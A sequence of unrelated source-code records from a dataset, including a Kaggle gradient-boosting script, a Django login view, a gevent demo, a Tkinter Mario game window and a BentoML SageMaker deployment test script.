'clapet_inf1_y', 'clapet_inf1_z',\n 'clapet_inf2_x', 'clapet_inf2_y', 'clapet_inf2_z',\n 'clapet_sup_2_x', 'clapet_sup_2_y', 'clapet_sup_2_z']\n self.df = data\n\n def __len__(self):\n return len(self.df)\n\n def get_val(self, columns: List[str], index: Union[np.ndarray, Iterable, int, float]) -> np.ndarray:\n \"\"\"\n Get the values of df given column names and indexes.\n :param columns: The columns in which the values are. Possible columns are :\n\n ['frame_id', 'sub_frame',\n 'b1_x', 'b1_y', 'b1_z',\n 'b2_x', 'b2_y', 'b2_z',\n 'b3_x', 'b3_y', 'b3_z',\n 'b4_x', 'b4_y', 'b4_z',\n 'y1_x', 'y1_y', 'y1_z',\n 'y2_x', 'y2_y', 'y2_z',\n 'x2_x', 'x2_y', 'x2_z',\n 'clapet_inf1_x', 'clapet_inf1_y', 'clapet_inf1_z',\n 'clapet_inf2_x', 'clapet_inf2_y', 'clapet_inf2_z',\n 'clapet_sup_2_x', 'clapet_sup_2_y', 'clapet_sup_2_z']\n\n :param index: The indexes in which the values are.\n :return: The values in a numpy array.\n \"\"\"\n return self.df[columns].iloc[index].to_numpy()\n\n def get_point(self, point_name: str, index: Union[np.ndarray, Iterable, int, float]) -> np.ndarray:\n \"\"\"\n Get the 3 coordinates of the point in self.df giving the point name and it'sin index in the pd.DataFrame\n :param point_name: The name of the point. Possible point name are :\n\n ['b1', 'b2', 'b3', 'b4', 'y1', 'y2', 'x2', 'clapet_inf1', 'clapet_inf2', 'clapet_sup_2']\n\n :param index: The index in df.\n :return: The coordinates of the points_name in the form of a numpy array of length 3.\n \"\"\"\n columns = [point_name + '_x', point_name + '_y', point_name + '_z']\n for e in columns:\n assert e in self.columns\n return self.df[columns].iloc[index].to_numpy()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"mc_analysis.py","file_name":"mc_analysis.py","file_ext":"py","file_size_in_byte":13965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"324148312","text":"import math\nimport os\nimport sys\nimport time\n\nimport keras.backend as K\nimport lightgbm as gbm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport progressbar\nimport tensorflow as tf\nimport random\nfrom keras import regularizers\nfrom keras.callbacks.callbacks import (EarlyStopping, LearningRateScheduler,\n ModelCheckpoint, ReduceLROnPlateau,\n TerminateOnNaN)\nfrom keras.layers import (LSTM, Activation, BatchNormalization, Bidirectional,\n Concatenate, Conv1D, Dense, Dropout, Embedding,\n GlobalMaxPooling1D, Input, MaxPooling1D, Multiply)\nfrom keras.models import Model, Sequential, load_model\nfrom keras.optimizers import SGD, Adam\nfrom keras.preprocessing import sequence\nfrom keras.regularizers import l2\nfrom scipy import stats\nfrom sklearn import svm\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.feature_selection import (RFE, SelectKBest, SelectPercentile,\n chi2, f_classif)\nfrom sklearn.metrics import (accuracy_score, precision_score, recall_score,\n roc_auc_score)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import class_weight, shuffle\nfrom xgboost import XGBRegressor, XGBClassifier\nfrom catboost import CatBoostClassifier\n\nsparse_index = [i for i in range(40)]\nsparse_index = [i for i in sparse_index if i not in [4, 10, 25]]\n\nprefix_path = 'data'\nlabels = pd.read_csv(prefix_path + '/train_kaggle.csv')\nprint('Labels', labels.describe())\niterations = 6\n\nparams = {\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': {'l2', 'l1'},\n 'num_leaves': 256,\n 'min_data_in_leaf': 106,\n 'learning_rate': 0.02,\n 'feature_fraction': 0.8,\n 'bagging_fraction': 0.9,\n 'num_threads': 4,\n 'bagging_freq': 10,\n 'verbose': 0,\n \"tree_learner\": \"feature\"\n}\n\n\ndef __preprocess_feature(feat):\n sparse_x = feat[:, sparse_index]\n return sparse_x\n\n\ndef __get_model(lgb_train, lgb_eval, x_train, y_train):\n model = gbm.train(params,\n lgb_train,\n num_boost_round=400,\n valid_sets=lgb_eval,\n early_stopping_rounds=30)\n return model\n '''\n clf = AdaBoostRegressor(n_estimators=500)\n clf.fit(X, y)\n return clf'''\n\n\ndef __extract_features(features, rand_indices):\n sparse_x = __preprocess_feature(np.array(features))\n\n # For each feature, we find average of all values and replace all NaN with that value\n sparse_means = np.nanmean(\n np.where(sparse_x != 0, sparse_x, np.nan), axis=0)\n sparse_max = np.nanmax(sparse_x, axis=0)\n\n sparse_medians = np.nanmedian(\n np.where(sparse_x != 0, sparse_x, np.nan), axis=0)\n sparse_nans = np.count_nonzero(np.isnan(sparse_x), axis=0)\n sparse_vars = np.nanvar(sparse_x, axis=0)\n sparse_modes = stats.mode(sparse_x)[0][0]\n\n # sp_features = np.concatenate([sparse_modes, sparse_vars, sparse_max, sparse_x[0], sparse_x[-1]])\n sp_features = np.concatenate([sparse_modes, sparse_vars, [sparse_x.shape[0]], sparse_x[0], sparse_x[-1]])\n return np.nan_to_num(sp_features, 0)\n\n\ntest_Y = []\n\nbatch_size = 256\ntrain_samples = 30336\ntest_samples = 10000\nno_epochs = 100\nmax_time = 50\n\nfor it in range(iterations):\n rand_indices = random.sample(range(1, 37), 25)\n test_X = []\n # Read test file\n test_X_features = []\n for fileno in range(10000):\n test_features = np.load(prefix_path + '/test/test/' + str(fileno) + '.npy')\n\n sp_features = __extract_features(test_features, rand_indices)\n\n test_X.append(sp_features)\n test_X_features.extend(test_features[:, 0])\n\n test_X = np.array(test_X)\n print('TEX shape', np.array(test_X_features).shape, np.unique(np.array(test_X_features)))\n\n print('Starting Iteration ', it)\n X = []\n y = []\n ones = len(labels.loc[labels['label'] == 1])\n\n shuffled_labels = shuffle(labels)\n shuffled_y = np.array(shuffled_labels['label'])\n\n for index, train_label in shuffled_labels.iterrows():\n label = train_label['label']\n if label == 0 and ones > 0:\n ones = ones - 0.8\n if ones <= 0 and label == 0:\n continue\n features = np.load(prefix_path + '/train/train/' +\n str(train_label['Id']) + '.npy')\n\n sp_features = __extract_features(features, rand_indices)\n X.append(sp_features)\n y.append(label)\n\n X = np.array(X)\n y = np.array(y)\n\n round_test_X = test_X # [:, top_features]\n\n x_train, x_val, y_train, y_val = train_test_split(X, y, test_size=0.20)\n\n lgb_train = gbm.Dataset(x_train, y_train)\n lgb_eval = gbm.Dataset(x_val, y_val, reference=lgb_train)\n\n gbm_model = __get_model(lgb_train, lgb_eval, x_train, y_train)\n\n xgb_model = XGBClassifier(learning_rate=0.1, scale_pos_weight=9, max_depth=7, min_child_weight=1, subsample=0.6,\n n_estimators=800, gamma=0.8, colsample_bytree=0.8)\n '''xgb_model = XGBClassifier(alpha=4, base_score=0.5, booster='gbtree', colsample_bylevel=1,\n colsample_bynode=1, colsample_bytree=0.9, gamma=0.1,\n learning_rate=0.05, max_delta_step=0, max_depth=9,\n min_child_weight=1, missing=-1, n_estimators=500, n_jobs=1,\n nthread=None, objective='binary:logistic', random_state=0,\n reg_alpha=0, reg_lambda=1, scale_pos_weight=1, seed=None,\n silent=None, subsample=0.9, tree_method='hist', verbosity=1)\n '''\n # xgb_model.fit(x_train, y_train, early_stopping_rounds=10, eval_metric=\"logloss\", eval_set=[(x_val, y_val)], verbose=True)\n\n cat_model = CatBoostClassifier()\n # cat_model.fit(x_train, y_train)\n\n # from sklearn.ensemble import BaggingClassifier\n\n # bag_model = BaggingClassifier()\n # bag_model.fit(x_train, y_train)\n\n y_pred = gbm_model.predict(x_val)\n print(y_pred.shape)\n\n xg_predictions = [int(round(value)) for value in y_pred]\n print(\n 'Round validation ROC-AUC = {}, accuracy = {}, recall = {}, precision = {}'.format(roc_auc_score(y_val, y_pred),\n accuracy_score(y_val,\n xg_predictions),\n recall_score(\n y_val, xg_predictions),\n precision_score(y_val,\n xg_predictions)))\n\n y_test_dl = gbm_model.predict(round_test_X)\n test_Y.append(y_test_dl)\n\ntest_Y = np.array(test_Y)\nprint('Results', test_Y.shape)\n\nprint(test_Y)\ntest_Y = np.average(test_Y, axis=0)\nprint(test_Y.shape, test_Y)\n\ndf = pd.DataFrame()\ndf[\"Predicted\"] = test_Y\ndf.to_csv('outputs/ml-output.csv', index_label=\"Id\")\n","sub_path":"src/ml_feat.py","file_name":"ml_feat.py","file_ext":"py","file_size_in_byte":7231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"249239872","text":"from imgurpython import ImgurClient\nimport BotIDs\nimport re\n\nalbum = \"http://imgur.com/a/5oSFy\"\nalbumID = re.findall(r\"imgur.com/a/(\\w+)\", album)[0]\n\nclient = ImgurClient(BotIDs.imgur_clientID, BotIDs.imgur_Secret)\n\nalbumObj = client.get_album(albumID)\nalbumPics = client.get_album_images(albumID)\n\nquotes = {}\n\nfor pic in albumPics:\n quotes[pic.description] = pic.link","sub_path":"cogs/glen.py","file_name":"glen.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"292357593","text":"''' 4.10.12\r\nauthor-manas verma\r\nsnake, water, gun game\r\nNow moving on to instructions.[ ignore, this is for me:| ]\r\n\r\nYou have to use a random choice function that we studied in tutorial #38, to\r\nselect between, snake, water, and gun.\r\n\r\nYou do not have to use a print statement in case of the above function.\r\n\r\nThen you have to give input from your side.\r\n\r\nAfter getting ten consecutive inputs, the computer will show the result based on each iteration.\r\nYou have to use loops(while loop is preferred).'''\r\n\r\nimport random\r\n\r\nprint('XXXXXXXXXXXXXSnake, Water, Gun gameXXXXXXXXXXXXXXXXXXXXX')\r\n\r\n\r\ndef wingame(you, comp):\r\n if comp == you:\r\n return None\r\n elif comp == 's':\r\n if you == 'w':\r\n return True\r\n elif you == 'g':\r\n return True,\r\n elif comp == 'w':\r\n if you == 'g':\r\n return False\r\n elif you == 's':\r\n return True\r\n elif comp == 'g':\r\n if you == 's':\r\n return False\r\n elif you == 'w':\r\n return True\r\ni = 0\r\nscore = 0\r\nwhile (i == 0):\r\n\r\n ra = random.randint(1, 3)\r\n if ra == 1:\r\n comp = 's'\r\n elif ra == 2:\r\n comp = 'w'\r\n elif ra == 3:\r\n comp = 'g'\r\n\r\n print('Computer Turn: Snake(s) Water(w) Gun(g)?')\r\n you = input('Your Turn: Snake(s) Water(w) Gun(g)?')\r\n print(f'Computer Chose {comp}')\r\n print(f'You Chose {you}')\r\n\r\n if wingame(you, comp) == None:\r\n print('Tie')\r\n\r\n elif wingame(you, comp):\r\n print('You Win!!')\r\n score = 5 + score\r\n print(score)\r\n\r\n else:\r\n print(\"You Lose!!\\ngame over\")\r\n i = int(input('Continue(0) Exit(1)?'))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"snake, water, gun game.py","file_name":"snake, water, gun game.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"588743401","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# stability region\n\n# set up \"complex plane\"\nx = np.linspace(-4,4,100)\ny = np.linspace(-4,4,100)\n\n[X, Y] = np.meshgrid(x, y)\nZ = X + 1j*Y\n\n# calculate region: \nU = abs(1 + Z + 0.5*Z**2 + (1./6)*Z**3 + (1./24)*Z**4)\n\n# and plot\nplt.contour(X, Y, U, [1]) # contour for U = 1\nplt.contourf(X, Y, U, [0, 1]) # colour area in interval [0,1]\n\nplt.xlabel(\"$\\lambda_{Re} \\Delta t$\")\nplt.ylabel(\"$\\lambda_{Im} \\Delta t$\")\n\nplt.show()\n\n# calculate amplification error + phase error\na = lambda z: (1 + 0.5*z**2 + (1./24)*z**4)**2 + (z - (1./6)*z**3)**2\ntheta = lambda z: np.tan((z - (1./6)*z**3)/(1 + 0.5*z**2 + (1./24)*z**4)) - z\n\nz = np.linspace(-3,3,100) # stable around approx +-2.8\n\nplt.plot(z, a(z), z, theta(z))\nplt.xlabel(\"$\\lambda_{Im} \\Delta t$\")\nplt.ylabel(\"Error\")\nplt.show()\n","sub_path":"stab_RK.py","file_name":"stab_RK.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"646737646","text":"# coding=utf-8\r\n# Version:python3.7.3\r\n# Tools:Pycharm\r\n__date__ = '2019/4/11 10:50'\r\n__author__ = 'Lee7'\r\nimport gevent\r\nimport time\r\n\r\n\r\ndef f1(n):\r\n\r\n for i in range(n):\r\n print(gevent.getcurrent(), i)\r\n # time.sleep(1)\r\n gevent.sleep(0.01)\r\n\r\n\r\ndef f2(n):\r\n\r\n for i in range(n):\r\n print(gevent.getcurrent(), i)\r\n # time.sleep(1)\r\n gevent.sleep(0.01)\r\n\r\n\r\ndef f3(n):\r\n\r\n for i in range(n):\r\n print(gevent.getcurrent(), i)\r\n # time.sleep(1)\r\n gevent.sleep(0.01)\r\n\r\n\r\ng1 = gevent.spawn(f1, 100)\r\ng2 = gevent.spawn(f2, 100)\r\ng3 = gevent.spawn(f3, 1000)\r\n\r\ng1.join()\r\n# time.sleep(100) # 并不会打断spawn的插入\r\ng2.join()\r\ng3.join()\r\n","sub_path":"多任务/lee7_gevent实现多任务.py","file_name":"lee7_gevent实现多任务.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166072332","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom models import *\nfrom django.contrib import messages\n\n# def test(request):\n# print \"/\\/\\/\\/\\/\\/ Create your views here.\"\n\ndef index(request):\n return render(request, \"users_app/index.html\") \n\ndef register(request):\n results = User.objects.register_validator(request.POST)\n if results['status']==False:\n for error in results['errors']:\n messages.error(request, error)\n return redirect('/index')\n user = User.objects.createUser(request.POST)\n messages.success(request, 'You registered successfully! Please log in.')\n return redirect('/')\n\ndef login(request):\n results = User.objects.login_validator(request.POST)\n if results['status']==False:\n for error in results['errors']:\n messages.error(request, error)\n return redirect('/index')\n # store a user auth token in sessions to allow a session check\n request.session['user_id']=results['user'].id\n request.session['user_first_name']=results['user'].first_name\n\n storage = messages.get_messages(request)\n storage.used = True\n return redirect('/success')\n\ndef sessionCheck(request):\n try:\n return request.session['user_id']\n except:\n return False\n\ndef success(request):\n if sessionCheck(request)==False:\n return redirect ('/')\n messages.success(request, 'Successfully logged in!')\n # return render(request, 'users_app/success.html')\n return HttpResponse(self, 'This will link to HOME page.')\n\ndef logout(request):\n request.session.flush()\n return redirect ('/')\n","sub_path":"python_stack/beltReview_project/apps/users_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590982775","text":"# -*- coding: utf-8 -*-\n\nimport Tkinter\nfrom Tkinter import *\n\nimport Image, ImageTk, tkFont\n\nfrom Data_window import Data_window\n\n############################################################################################################################\n#\n#\tDéfinition des variables globales.\n#\n############################################################################################################################\n\n# Données sur la fenetre principale\nGAME_WIDTH = 1000\nGAME_HEIGHT = 500 \n\n############################################################################################################################\n#\n#\t\tClasse Window:\n#\t\tinstanciation de l'afficheur, boucle principale, widgets Tkinter\n#\n############################################################################################################################\n\nclass Window(Tkinter.Tk):\n\n def __init__(self,parent):\n Tkinter.Tk.__init__(self,None)\n self.initialize()\n\n############################################################################################################################\n#\tInitialise les données :\n############################################################################################################################\n\n def initialize(self):\n \n ## Paramètre d'affichage de la fenetre ##\n self.title('Mario')\n self.grid # type grille d'organisation cf Tkinter\n self.geometry(\"1000x550\") # Taille de la fenetre\n self.entry = Tkinter.Entry(self)\n self.grid_columnconfigure(0,weight=1)\n self.resizable(False,False) # fenetre extensible\n\n self.data_window = Data_window(self)\n \n ## Composants graphiques de la fenetre ##\n\n panneau=Tkinter.PanedWindow(orient=Tkinter.VERTICAL) # Panneau principal\n panneau.pack(expand=\"yes\", fill=\"both\")\n\n # Menu #\n menu = Tkinter.PanedWindow(height=25,orient=Tkinter.HORIZONTAL) # ligne de menu contenant les boutons d'interaction\n panneau.add(menu)\n\n # Logo #\n mario_img=Image.open(\"./mario_b.gif\") # chargement de l'image\n mario_img = mario_img.resize((75,48))\n mario_img = ImageTk.PhotoImage(mario_img)\n label = Tkinter.Label(image=mario_img) # création du label\n label.photo = mario_img # configuration du label en mode image\n menu.add(label)\n \n # Boutons #\n test = Tkinter.Button(menu,text=\"Boutton test\", command=self.test) # Autre bouton\n menu.add(test)\n\n # Bouton de selection du niveau\n level_button_text = \"level 0\"\n self.level = Tkinter.Button(menu,text=level_button_text, command=self.set_level) # Bouton de redemarrage\n menu.add(self.level)\n\n # Bouton de redemarrage du niveau\n restart = Tkinter.Button(menu,text=\"Restart\", command=self.restart) # Bouton de redemarrage\n menu.add(restart)\n \n \n ## Zone de jeu ##\n\n self.game_window = Tkinter.Canvas(self, background='darkgray',width=GAME_WIDTH, height = GAME_HEIGHT) # Création d'une zone graphique : Canvas\n self.game_window.pack(side=Tkinter.BOTTOM) # Positionnement en bas\n\n ## Interruptions clavier ##\n\n # Controles manuels\n self.bind_all('d', self.forward) # Avancer 'd'\n self.bind_all('q', self.back) # Reculer 'q'\n self.bind_all(\"\", self.jump) # sauter Space\n \n self.bind_all('t', self.test)\n\n\n############################################################################################################################\n#\tMethodes d'appel de deplacement\n############################################################################################################################\n\n def forward(self,*args):\n self.control.ordered(\"forward\")\n\n def back(self,*args):\n self.control.ordered(\"back\")\n\n def jump(self,*args):\n self.control.ordered(\"jump\")\n\n # Avance selon la direction du personnage #\n def walk(self,*args):\n self.control.ordered(\"walk\")\n\n############################################################################################################################\n#\tMethodes génériques\n############################################################################################################################\n\n def get_window(self):\n return self.game_window\n\n def set_control(self,control):\n self.control = control\n self.data_window.set_control(self.control)\n\n def restart(self,*args):\n self.control.restart()\n\n def test(self,*args):\n self.control.test(args)\n\n def set_level(self,*args):\n if self.control.level < 7:\n self.control.level = self.control.level + 1\n else:\n self.control.level = 0\n self.level_button_text = \"level \"+str(self.control.level)\n self.level.config(text = self.level_button_text)\n\n############################################################################################################################\n#\tméthodes générales\n############################################################################################################################\n \n def pop_text(self,text):\n font = tkFont.Font(size = 50, weight = \"bold\")\n return self.game_window.create_text(400,200, text=text,font=font)\n \n def update_data(self):\n self.data_window.update_data()\n \n def update_assertz(self,interdiction):\n self.data_window.update_assertz(interdiction)","sub_path":"2.0/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330907157","text":"#!/usr/bin/env python\n\nimport subprocess\nimport logging\nimport uuid\n\nfrom bentoml import BentoService, load, api\nfrom bentoml.handlers import DataframeHandler\n\nlogger = logging.getLogger('bentoml.test')\n\n\ndef run_sagemaker_create_or_update_command(deploy_command):\n deployment_failed = False\n endpoint_name = ''\n logger.info(f\"Running bentoml deploy command: {' '.join(deploy_command)}\")\n with subprocess.Popen(\n deploy_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n ) as proc:\n deployment_stdout = proc.stdout.read().decode('utf-8')\n logger.info('Finish deploying to AWS Sagemaker')\n logger.info(deployment_stdout)\n\n if deployment_stdout.startswith(\n 'Failed to create AWS Sagemaker deployment'\n ) or deployment_stdout.startswith('Failed to update AWS Sagemaker deployment'):\n deployment_failed = True\n return deployment_failed, endpoint_name\n deployment_stdout_list = deployment_stdout.split('\\n')\n for index, message in enumerate(deployment_stdout_list):\n if '\"EndpointName\":' in message:\n endpoint_name = message.split(':')[1].strip(',').replace('\"', '')\n\n return deployment_failed, endpoint_name\n\n\ndef test_deployment_result(endpoint_name, expect_result, sample_data=None):\n logger.info(f'Test deployment with sample request for {endpoint_name}')\n deployment_failed = False\n sample_data = sample_data or '\"[0]\"'\n try:\n test_command = [\n 'aws',\n 'sagemaker-runtime',\n 'invoke-endpoint',\n '--endpoint-name',\n endpoint_name,\n '--content-type',\n '\"application/json\"',\n '--body',\n sample_data,\n '>(cat) 1>/dev/null',\n '|',\n 'jq .',\n ]\n logger.info('Testing command: %s', ' '.join(test_command))\n result = subprocess.run(\n ' '.join(test_command),\n capture_output=True,\n shell=True,\n executable='/bin/bash',\n )\n logger.info(result)\n if result.stderr.decode('utf-8'):\n logger.error(result.stderr.decode('utf-8'))\n deployment_failed = True\n else:\n logger.info('Prediction Result: %s', result.stdout.decode('utf-8'))\n if expect_result == result.stdout.decode('utf-8'):\n deployment_failed = False\n else:\n deployment_failed = True\n logger.info(\n f\"Did deployment failed? {deployment_failed} \"\n f\"Actual result '{result.stdout.decode('utf-8')}', and expect \"\n f\"result '{expect_result}'\"\n )\n except Exception as e:\n logger.error(str(e))\n deployment_failed = True\n\n return deployment_failed\n\n\ndef delete_deployment(deployment_name):\n logger.info('Delete test deployment with BentoML CLI')\n delete_deployment_command = [\n 'bentoml',\n 'sagemaker',\n 'delete',\n deployment_name,\n '--force',\n ]\n logger.info(f'Delete command: {delete_deployment_command}')\n with subprocess.Popen(\n delete_deployment_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n ) as proc:\n delete_deployment_stdout = proc.stdout.read().decode('utf-8')\n logger.info(delete_deployment_stdout)\n\n\nclass TestDeploymentService(BentoService):\n @api(DataframeHandler)\n def predict(self, df):\n return 1\n\n @api(DataframeHandler)\n def classify(self, df):\n return 'cat'\n\n\nclass UpdatedTestDeploymentService(BentoService):\n @api(DataframeHandler)\n def predict(self, df):\n return 1\n\n @api(DataframeHandler)\n def classify(self, df):\n # change result from cat to dog\n return 'dog'\n\n\nif __name__ == '__main__':\n deployment_failed = False\n random_hash = uuid.uuid4().hex[:6]\n deployment_name = f'tests-sagemaker-update-e2e-{random_hash}'\n region = 'us-west-2'\n\n logger.info('Creating version one BentoService bundle..')\n service_ver_one = TestDeploymentService()\n saved_path = service_ver_one.save()\n\n loaded_ver_one_service = load(saved_path)\n bento_name = f'{loaded_ver_one_service.name}:{loaded_ver_one_service.version}'\n create_deployment_command = [\n 'bentoml',\n 'sagemaker',\n 'deploy',\n deployment_name,\n '-b',\n bento_name,\n '--api-name',\n 'classify',\n '--verbose',\n ]\n deployment_failed, endpoint_name = run_sagemaker_create_or_update_command(\n create_deployment_command\n )\n\n if not deployment_failed and endpoint_name:\n deployment_failed = test_deployment_result(endpoint_name, '\"cat\"\\n')\n else:\n deployment_failed = True\n logger.info('Deployment failed for creating deployment')\n\n # if not deployment_failed:\n # logger.info('UPDATED ENV FOR DEPLOYMENT')\n # update_deployment_command = [\n # 'bentoml',\n # 'deploy',\n # 'update',\n # deployment_name,\n # '--api-name',\n # 'predict',\n # '--verbose',\n # ]\n # deployment_failed, endpoint_name = run_sagemaker_create_or_update_command(\n # update_deployment_command\n # )\n # if not deployment_failed and endpoint_name:\n # deployment_failed = test_deployment_result(endpoint_name, '1\\n')\n # else:\n # logger.info(\n # 'Deployment failed for updating env without changing BentoService'\n # )\n\n if not deployment_failed:\n\n logger.info('UPDATED NEW BENTO FOR DEPLOYMENT')\n service_ver_two = UpdatedTestDeploymentService()\n saved_path = service_ver_two.save()\n\n loaded_ver_two_service = load(saved_path)\n bento_name = f'{loaded_ver_two_service.name}:{loaded_ver_two_service.version}'\n\n update_bento_version_deployment_command = [\n 'bentoml',\n 'sagemaker',\n 'update',\n deployment_name,\n '-b',\n bento_name,\n '--wait',\n '--verbose',\n ]\n deployment_failed, endpoint_name = run_sagemaker_create_or_update_command(\n update_bento_version_deployment_command\n )\n if not deployment_failed and endpoint_name:\n deployment_failed = test_deployment_result(endpoint_name, '\"dog\"\\n')\n else:\n logger.info('Deployment failed for updating BentoService')\n\n delete_deployment(deployment_name)\n\n logger.info('Finished')\n if deployment_failed:\n logger.info(\n 'E2E update sagemaker deployment failed, fix the issues before releasing'\n )\n else:\n logger.info('E2E Sagemaker update deployment testing is successful')\n","sub_path":"scripts/e2e_tests/aws_sagemaker/e2e_sagemaker_update_deployment.py","file_name":"e2e_sagemaker_update_deployment.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"76191147","text":"class Solution(object):\n def decodeString(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n # recursion: DFS\n # DFS need to return two:\n # 1. for the content within []\n # 2. the index of ]\n return self.DFS(s, 0)[0]\n\n def DFS(self, s, j):\n # return (res, j) where j is the last ] position\n # i is the start index within []\n if not s:\n return (\"\", j)\n start = j # the start may not necessarily a number\n res = \"\"\n while j < len(s):\n if s[j] == \"[\":\n cnt = int(s[start:j]) # the front of [ must be a number\n ss, j = self.DFS(s, j + 1)\n start = j+1\n res += cnt * ss\n elif s[j] == \"]\": # end of this level, break\n break\n elif s[j].isdigit():\n if not s[start].isdigit(): # the start may not necessarily a number\n start = j\n else:\n res += s[j]\n j += 1\n return res, j","sub_path":"394_decode_string/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"409138377","text":"import sqlite3 as lite\nfrom miniworldmaker import *\nimport easygui\n\n\nclass MyBoard(TiledBoard):\n\n def __init__(self, **kwargs):\n super().__init__(rows=12, columns=12, tile_size=40)\n self.register_token_type(Robot)\n self.register_token_type(Wall)\n self.register_token_type(Gold)\n self.register_token_type(Diamond)\n self.register_token_type(Emerald)\n self.create_world_toolbar = SelectTokenTypeToolbar(self)\n self.create_world_toolbar.add_widget(SaveButton(\"db_files/ctw_db.db\", self, \"Save\"))\n self.create_world_toolbar.add_widget(LoadButton(\"db_files/ctw_db.db\", self, \"Load\", ))\n self._window.add_container(self.create_world_toolbar, \"right\")\n self.event_console = EventConsole()\n self.event_console.register_events = {\"all\"}\n self._window.add_container(self.event_console, \"right\", size=500)\n self.add_image(path=\"images/stone.jpg\")\n\n def get_event(self, event, data):\n if event == \"mouse_left\":\n position = self.get_board_position_from_pixel(data)\n actor = self.add_to_board(self.create_world_toolbar.selected_actor(), position=position)\n elif event == \"mouse_right\":\n position = self.get_board_position_from_pixel(data)\n self.remove_tokens_in_area(position)\n\n\nclass Robot(Actor):\n def __init__(self):\n super().__init__()\n self.add_image(\"images/robo_green.png\")\n\n\nclass Wall(Token):\n def __init__(self):\n super().__init__()\n self.add_image(\"images/rock.png\")\n\n\nclass Gold(Token):\n def __init__(self):\n super().__init__()\n self.add_image(\"images/stone_gold.png\")\n\n\nclass Diamond(Token):\n def __init__(self):\n super().__init__()\n self.add_image(\"images/stone_blue.png\",)\n\n\nclass Emerald(Token):\n def __init__(self):\n super().__init__()\n self.add_image(\"images/stone_green.png\")\n\n\nmy_board = MyBoard()\nmy_board.show()\n","sub_path":"examples/robot/create_robot_world.py","file_name":"create_robot_world.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"234981780","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 28 14:52:26 2018\n\n@author: dat\n\"\"\"\n\nimport utility\nimport numpy as np\nimport cloudpickle as pickle\nfrom scipy import misc\nimport copy\nimport imageio\nimport os\nimport time\nfrom datetime import timedelta\nimport dim2_keras as dim\n\n\n\"\"\"\nhyper-parameters\n\"\"\"\nlearning_rate = [0.1, 0.01, 0.001, 0.0001] #parameter used in gradient descent optimization\nepochs_schedule = [30, 30, 30, 30] #how many times to go over the training obs during optimizing\nregularizer = 0.0001 #?\ntarget_shape = [64, 64] # the size of the patches given to the network\nbatch_size = 128 #the number of training obs to use at once\n\n\"\"\"\ndata\n\"\"\"\n\ntest_images = np.load('../data/test.npy')\ntest_annotation = '../data/test_2class_annotation.txt'\n\n\"\"\"\nGet W_max_t and H_max_t for buffer\n\"\"\"\n# load window size configuration\nfid = open('../data/set1_annotation.pickle','rb')\ndata_tmp = pickle.load(fid)\nfid.close()\nH_max_t = data_tmp['H_max'] #the biggest bounding box in the training and validation annotations\nW_max_t = data_tmp['W_max']\n \nx_start=int(0+H_max_t*0.5)\nx_stop=int(3420-225-H_max_t*0.5)\ny_start=int(0+W_max_t*0.5)\ny_stop=int(6080-W_max_t*0.5)\n\n\"\"\"\nSome needed functions\n\"\"\"\n\ndef make_all_f(ann):\n ann2=copy.deepcopy(ann)\n ann3=[]\n for box in ann2:\n if box[-1]!='NA':\n box=(box[0],'F')\n ann3.append(box)\n return ann3\n\ndef calculate_minibox(filename): \n fid = open(filename,'r')\n content = fid.read().split('\\n')[1:-1]\n fid.close()\n minibox = 3420*6080\n \n for index, row in enumerate(content):\n name, id, y, x, width , height, label = row.split(',')\n x, y, width, height = int(x), int(y), int(width), int(height)\n xmin = x\n xmax = x+height\n ymin = y\n ymax = y+width\n area = (xmax-xmin+1)*(ymax-ymin+1)\n \n if label!='NA' and area < minibox:\n minibox = area\n \n return minibox\n\ndef mean_iou(iou_mat):\n rows = []\n for row in iou_mat:\n row = [x for x in row if x>0]\n if len(row)>0:\n rows.append(sum(row)/len(row))\n else:\n rows.append(0)\n return rows\n\n\n\"\"\"\nCalculate minimum area threshold for predicted bounding boxes\n\"\"\"\nminibox1 = calculate_minibox('../data/Dryas2_sub.txt')\nminibox2 = calculate_minibox('../data/NARS.txt')\nminibox = min(minibox1,minibox2)\n\n\n\"\"\"\nsetup\n\"\"\"\n#model = md.get_flower_model((target_shape[0],target_shape[1],3), 2) #initial model\nmodel =dim.dim2_model((target_shape[0],target_shape[1],3),2)\ncurrent_weights = 